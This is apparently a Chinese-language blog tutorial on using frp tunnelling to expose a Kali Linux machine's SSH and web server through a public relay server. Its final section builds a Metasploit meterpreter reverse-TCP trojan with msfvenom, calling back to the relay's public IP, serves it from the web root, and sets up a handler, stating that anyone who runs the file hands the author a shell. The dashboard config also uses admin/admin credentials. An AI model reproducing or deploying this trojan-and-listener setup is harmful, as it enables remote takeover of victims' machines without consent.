一个是服务器和客户机的连接
一个是隧道
- 前言
- 一、下载frp
- 二、建立连接
- 1.服务器配置 frps.ini
- 2.kali配置 frpc.ini
- 三、建立ssh连接
- 1.服务器配置 frps.ini
- 2.kali配置 frpc.ini
- 四、建立web内网映射 并且 建立仪表盘
- 1.服务器配置 frps.ini
- 2.kali配置 frpc.ini
- 五、 配置 MSF木马 接收来自公网的 shell
- --------------容易遇到的问题--------------
前言
提示:
123
一、下载frp
wget https://github.com/fatedier/frp/releases/download/v0.42.0/frp_0.42.0_linux_amd64.tar.gz二、建立连接 1.服务器配置 frps.ini
[common] bind_port = 70002.kali配置 frpc.ini
[common] server_addr = 43.138.57.47 server_port = 7000三、建立ssh连接 1.服务器配置 frps.ini
[common] bind_port = 70002.kali配置 frpc.ini
[common] server_addr = 43.138.57.47 server_port = 7000 [ssh] type = tcp local_ip = 127.0.0.1 local_port = 22 remote_port = 6000四、建立web内网映射 并且 建立仪表盘
把kali的apache2网页通过外网映射出去
1.服务器配置 frps.ini[common] bind_port = 7000 vhost_http_port = 80 #http默认是80 dashboard_port = 7500 #仪表盘`端口` dashboard_user = admin #仪表盘`账号` dashboard_pwd = admin #仪表盘`密码`2.kali配置 frpc.ini
[common] server_addr = 43.138.57.47 server_port = 7000 [web] type = http local_port = 80 custom_domains = zhaofeixiang.xyz五、 配置 MSF木马 接收来自公网的 shell
1.服务器配置 frps.ini
[common] bind_port = 7000
2.kali配置 frpc.ini
[common] server_addr = 43.138.57.47 server_port = 7000 [msf] type = tcp local_port = 4444 local_ip = 192.168.0.55 remote_port = 8000
3.生成 payload
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=43.138.57.47 LPORT=8000 -b "x00" -f elf -o /var/www/html/feixiang
4.启动监听 通过handler模块
use exploit/multi/handler
5.设置payload
4444端口要开启
set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.0.55 set LPORT 4444 run
6.然后就是谁运行了 feixiang 文件 我这边就能监听到 获取他的shell
--------------容易遇到的问题--------------1.kali要开启 ssh
2.服务器要开启 7000防火墙端口
3.端口没开
4.web服务没开
5.防火墙端口
添加 firewall-cmd --zone=public --add-port=80/tcp --permanent (–permanent永久生效,没有此参数重启后失效)
重新载入 firewall-cmd --reload
查看 firewall-cmd --zone=public --query-port=80/tcp
删除 firewall-cmd --zone=public --remove-port=80/tcp --permanent



